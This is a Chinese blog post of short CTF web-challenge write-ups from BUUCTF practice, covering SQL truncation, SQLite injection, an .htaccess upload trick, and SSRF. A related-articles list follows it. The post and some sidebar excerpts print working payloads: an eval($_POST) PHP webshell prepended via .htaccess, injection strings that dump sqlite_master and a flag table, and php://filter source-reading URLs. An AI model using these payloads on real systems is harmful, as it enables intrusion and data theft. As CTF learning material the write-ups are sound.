buu-day08

最新推荐文章于 2023-09-04 16:07:09 发布
最新推荐文章于 2023-09-04 16:07:09 发布
阅读量605 收藏
点赞数
分类专栏: CTF复现 文章标签: 服务器 mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/anwen12/article/details/122319001
版权

又是早起刷题的一天

0x01 [FBCTF2019]Products Manager

  • sql约束注入

    在插入数据的时候,如果字段设置了应该插入的字符串长度,那么在添加的时候,如果有超过该长度的,就会被截断

  • mysql字符串比较

    mysql == `mysql空格空格空格空格空格空格空格空格空格空格

image-20220105080355847

可以看到sql的每个字段都进行了长度限制,并且在最后的位置并没有进行代码上的处理而是直接插入。所以,我们就可以开始操作了。

插入

name: facebook                                    11
scert: 123456qwert
des: dviurbwgpbwf

然后查询

name: facebook
scert: 123456qwert

0x02[BSidesCF 2019]Sequel

sqlite注入,难度还行,like模糊匹配就可以了。

0x03 [b01lers2020]Space Noodles

https://tyaoo.github.io/2020/05/26/BUUCTF-2/

完全没懂这个题目是什么意思,好想类似于之前做的那种签到有趣题,就是猜,到底用哪种请求方法去访问接口,正确了就给你返回。

开头先列一下 HTTP 的请求方法,下面会用到

序号方法描述
1GET请求指定的页面信息,并返回实体主体。
2HEAD类似于 GET 请求,只不过返回的响应中没有具体的内容,用于获取报头
3POST向指定资源提交数据进行处理请求(例如提交表单或者上传文件)。数据被包含在请求体中。POST 请求可能会导致新的资源的建立和/或已有资源的修改。
4PUT从客户端向服务器传送的数据取代指定的文档的内容。
5DELETE请求服务器删除指定的页面。
6CONNECTHTTP/1.1 协议中预留给能够将连接改为管道方式的代理服务器。
7OPTIONS允许客户端查看服务器的性能。
8TRACE回显服务器收到的请求,主要用于测试或诊断。
9PATCH是对 PUT 方法的补充,用来对已知资源进行局部更新 。

0x04 [极客大挑战 2020]Roamphp2-Myblog

assets/img/upload/deb4b643fea6111d2d8cac5475225e87210ca3b4.jpg

文件包含拿到源码,登录的时候他是和session存储的密码进行比对的,那么我们如果把session删除并且把password置为空,就可以登录成功了。

0x05 [JMCTF 2021]UploadHub

津门CTF题目的复现。

<FilesMatch .htaccess>
SetHandler application/x-httpd-php 
Require all granted  
php_flag engine on  
</FilesMatch>

php_value auto_prepend_file .htaccess
#<?php eval($_POST['dem0']);?>

这里面的一个点就是 dir标签要晚于file标签执行,所以利用优先级的差距。这个就被接出来了。

但是还是要点名表扬一下NU1L大哥,yyds!

<If "file('/flag')=~ '/flag{/'">
ErrorDocument 404 "wupco"
</If>

也就是如果匹配到了,那么就设置404页面中存在wupco,就可以判断是否成功了。~表示开启正则匹配。

https://httpd.apache.org/docs/2.4/expr.html

https://httpd.apache.org/docs/2.4/mod/core.html#file

https://httpd.apache.org/docs/2.4/sections.html

0x06 [Zer0pts2020]phpNantokaAdmin

查看源码

$sql = "CREATE TABLE {$table_name} (";
$sql .= "dummy1 TEXT, dummy2 TEXT";
$sql .= ', ';
$sql .= "`$column` $type";
$sql .= ');';
create table {$table_name} (dummy1 TEXT, dummy2 TEXT, $column $type);

$pdo->query('CREATE TABLE `' . FLAG_TABLE . '` (`' . FLAG_COLUMN . '` TEXT);');
$pdo->query('INSERT INTO `' . FLAG_TABLE . '` VALUES ("' . FLAG . '");');
$pdo->query($sql);

image-20220105102321175

可以看到将列名在页面中显示出来了。所以我们可以考虑在这里进行注入。由于之前,已经做过相关的分析,[]可以用这个来进行注释。

sqlite_master yyds!

table_name=landv as select sql [&columns[0][name]=abc&columns[0][type]=] from sqlite_master;

table_name=landv as select flag_2a2d04c3 [&columns[0][name]=abc&columns[0][type]=] from flag_bf1811da;

这里两次拼接出来的语句是

create table landv as select sql [ (dummy1 TEXT, dummy2 TEXT, abc ] from sqlite_master;);

create table landv (a); 最后的语句就是这样,也就是在create中如何来

image-20220105103011239

0x07 [FireshellCTF2020]URL TO PDF

首先是一个输入url的输入框,www.baidu.com

yyds.发现就是渲染当前页面的。然后存储为pdf,然后就啥也不知道了。看看它是使用了什么爬虫引擎。

easyPrint 51 (http://weasyprint.org/)

这好想不是一个nodejs的库,所以不难直接xss来getshell,考虑一个ssrf单纯的利用。file:///flag

储为pdf,然后就啥也不知道了。看看它是使用了什么爬虫引擎。

easyPrint 51 (http://weasyprint.org/)

这好想不是一个nodejs的库,所以不难直接xss来getshell,考虑一个ssrf单纯的利用。file:///flag

然后找所有可以接入到网站中的标签,查看wp发现了link标签可以。

今天是懒狗早下班的一天

Dem0@
关注
专栏目录
buu-BSideCF-2020-Had a bad day1】
lalalalafan的博客
11-15 2807
1.打开看源码,啥也没得,参数后面加'就报错了,是一道文件包含 2.读源码 ?category=php://filter/read=convert.base64-encode/resource=index.php 报错了,后端自己加上了.php,所以我们删了 ?category=php://filter/read=convert.base64-encode/resource=index 就可以得到base64编码后的源码了 解码得到源码 <?php $file = $
buu-[CISCN2019 华北赛区 Day1 Web5]CyberPunk
qaq517384的博客
10-10 271
F12能看到提示 ?file猜测文件包含,先是伪协议读源码 ?file=php://filter/convert.base64-encode/resource=index.php <?php //index.php ini_set('open_basedir', '/var/www/html/'); // $file = $_GET["file"]; $file = (isset($_GET['file']) ? $_GET['file'] : null); if (isset($file)){
[JMCTF 2021]UploadHub
D.MIND 的博客
05-19 2001
主要看apache2.conf配置文件: <Directory ~ "/var/www/html/upload/[a-f0-9]{32}/"> php_flag engine off </Directory> php_flag engine off是会使整个目录不解析php的,所以上传php文件是行不通的 这题主要在配置上给我们限制了很多,而.htaccess就是可以修改配置的一个文件,恰好此题是可以上传.htaccess的(此题似乎并不做上传限制) 方法一 .ht
WEB漏洞攻防 - 文件上传漏洞 - CTF - [CTF2020 新生赛] Upload 1
易编橙 · 终身成长社群,相遇已是上上签!
09-03 454
关卡: WEB - [CTF2020 新生赛]Upload 1
[极客大挑战 2020]Roamphp2-Myblog
m0_64348326的博客
09-04 250
3.进入后台上面读取到的文件上传代码就重要了,它采取了白名单的方式只允许图片后缀上传,但是要访问压缩包里面的木马文件,还需要使用。木马文件,不用加后缀,因为它会自动加。文件,并从中读取序列化数据的。1.进入到界面,url主界面一个很明显的文件包含,直接用。,因为可以猜测到它的文件包含页面逻辑会给所有文件名都加上。,明显密码和登录界面说的一样,获取不了。协议的用法,因为想到了,无论文件是什么后缀,名给删除,php就找不到密码数据了,也就是。6.上传成功,访问即可执行命令,,上传的时候再访问压缩包内的。
[极客大挑战 2020]
qq_62046696的博客
09-18 564
可以看到,他设置了白名单,但我想传一句话木马上去,而且上传成功的话他会告诉你上传的路径,然后再用之前可以传的page参数可以解析伪协议的,但是并不确定是否可以php文件也会被解析,先不想那么多,做来看。坚定了我传木马的决心,这里想到了将php文件打包成zip,改后缀名为jpg,再利用zip伪协议进行读取。整体看下来,要执行check过滤函数,我们就需要执行,waf的else部分,然后过滤掉了php、eval可以用PHP短标签进行绕过,比如。请求方式有误,比如应该用GET请求方式的资源,用了POST。
buu-[CISCN2019 总决赛 Day2 Web1]Easyweb
qaq517384的博客
10-10 254
扫!(或者靠经验先试) /robots.txt 看源码发现已知的php只有user.php/image.php/index.php 然后在image.php.bak里找到源码 <?php include "config.php"; $id=isset($_GET["id"])?$_GET["id"]:"1"; $path=isset($_GET["path"])?$_GET["path"]:""; $id=addslashes($id); $path=addslashes($path); $i
2021-05-6 CTF Misc buu oj day7 6道题
LiNa_lInA_741的博客
05-06 959
这里写目录标题九连环类型图片文件解题标题 九连环 类型 jpg图片分析 图片文件 123456cry.jpg 解题 据说是伪加密(文件目录加密而全局目录未加密),但是经过基础检查,用binwalk分析是可以zip文件的: 解压后的文件又看到一个图片和一个加密的zip压缩包,压缩包里面和asd文件夹里一样,都是一张图片“good-已合并.jpg”和一个带flag.txt的“qwe”压缩包: 基础检查“good-已合并.jpg”并未发现异常,这里下载了一个新的隐写查看工具steghide,看一下stegh
2021-04-30 CTF Misc buu oj day6 5道题
LiNa_lInA_741的博客
05-02 666
这里写目录标题神秘龙卷风类型压缩包文件解题 神秘龙卷风 类型 rar压缩包分析、编码分析 压缩包文件 神秘龙卷风.rar 解题 rar压缩包加密4位密码用ARCHPR直接爆破:5463 里面txt文件打开是+.>组成,数了一下到第一个.>的+数量,是102,对着ASCII编码表看了一眼对应字母“f”,于是猜测后面应该都这样就能编码出flag{}(后证实这纯属瞎猜)。 看其他解法发现是Brainfuck编码,+表示指针指向字节加一,.表示输出指针指向内容,>表示指针加一。Brainfu
fbctf base.php,[FBCTF2019]Products Manager
weixin_35214204的博客
03-28 263
基于约束的SQL攻击一、知识点:1.数据库字符串比较:在数据库对字符串进行比较时,如果两个字符串的长度不一样,则会将较短的字符串末尾填充空格,使两个字符串的长度一致,比如,字符串A:[String]和字符串B:[String2]进行比较时,由于String2比String多了一个字符串,这时MySQL会将字符串A填充为[String ],即在原来字符串后面加了一个空格,使两个字符串长度一致。如下两...
2021-08-08ctf中的上传upload题目.user.ini绕过后缀黑名单过滤(同文件夹下有php文件突破口)
qq_45290991的博客
08-08 1202
从SUCTF 2019 CheckIn 浅谈.user.ini的利用 / 2019-08-28 08:59:00 / 转自loong大佬-来自先知社区 ...
ctf-攻防世界-web:upload1
一只菜鸟的博客
11-01 523
一个很简单绕过的文件上传 打开靶场,发现一个很简单的上传点。在靶场地址后面加index.php,正常访问无跳转,加index.asp,报错且显示apache容器,看来绝对是php的网站了 burp开启代理,尝试上传php一句话,发现burp没发送请求包就提示文件类型不对,看来是前端验证文件类型。 右键查看源代码,果然是前端验证,只能上传jpg和png。 把写好的一句话后缀改为jpg或png,开启burp,在上传时抓包,将文件后缀改为php,成功绕过上传,并显示...
CTF-Hub-文件上传
qq_60905276的博客
11-22 497
1.00截断 00截断通常用来绕过web软waf的白名单限制。 条件:php版本小于5.3.29 2.双写后缀绕过 用于只将文件后缀名,例如"php"字符串过滤的场合; 例如:上传时将Burpsuite截获的数据包中文件名【evil.php】改为【evil.pphphp】,那么过滤了第一个"php"字符串"后,开头的'p'和结尾的'hp'就组合又形成了【php】。 不过为什么老是报错呢? ...
[CTFHub] Web 文件上传 Write ups
yym68686
02-20 639
无验证 新建php文件,上传。 <?php @eval($_POST["password"]);?> 页面回显上传的文件的相对路径: upload/sh.php 利用蚁剑空白区域右击添加数据,设置如下: URL地址 http://challenge-a7288a7b4363f849.sandbox.ctfhub.com:10080/upload/sh.php 连接密码 password 网站备注 编码设置 UTF8 连接类型 PHP 其他不变。密码可以随便设置,要跟$_POST[“pas
CTF笔记:BUUCTF-[ACTF新生赛]Upload1
dqx1223的博客
07-09 816
ctf笔记
BUUCTF [极客大挑战 2020] Roamphp1-Welcome
Senimo
12-21 1314
BUUCTF [极客大挑战 2020] Roamphp1-Welcome 考点: POST传参方式 sha1()不能加密数组 启动题目: 等了一阵子,一直是这样,查阅其他wp得知,原题中提示有:换一种请求方式 使用BurpSuite抓去数据包: 将传参方式修改为POST,发送数据包,得到题目源码: error_reporting(0); if ($_SERVER['REQUEST_METHOD'] !== 'POST') { header("HTTP/1.1 405 Method Not Allow
BUUCTF:[b01lers2020]Life on Mars
末初的CSDN博客
08-01 2120
题目地址:https://buuoj.cn/challenges#[b01lers2020]Life%20on%20Mars 一个关于火星生命的科普站,目录扫描啥都没发现,用burp抓两个包分析一下,发现几个可疑传参 /query?search=如果地名输入正确,发现返回如下 order by判断字段,2字段时回显正确 union联合查询:/query?search=amazonis_planitia union select 111,222 回显点如图所示: 查库:/query?search=a
buu Quoted-printable
最新发布
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。 在解密Quoted-printable编码时,我们可以使用在线工具来帮助我们。一个可以使用的工具是[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。 根据提供的信息,得到的flag是"flag{那你也很棒哦}"。 总结:Quoted-printable是一种常见的邮件编码方法,用于将非ASCII字符转换为可打印的ASCII字符。解密Quoted-printable编码可以使用在线工具,如[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。根据提供的信息,得到的flag是"flag{那你也很棒哦}"。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值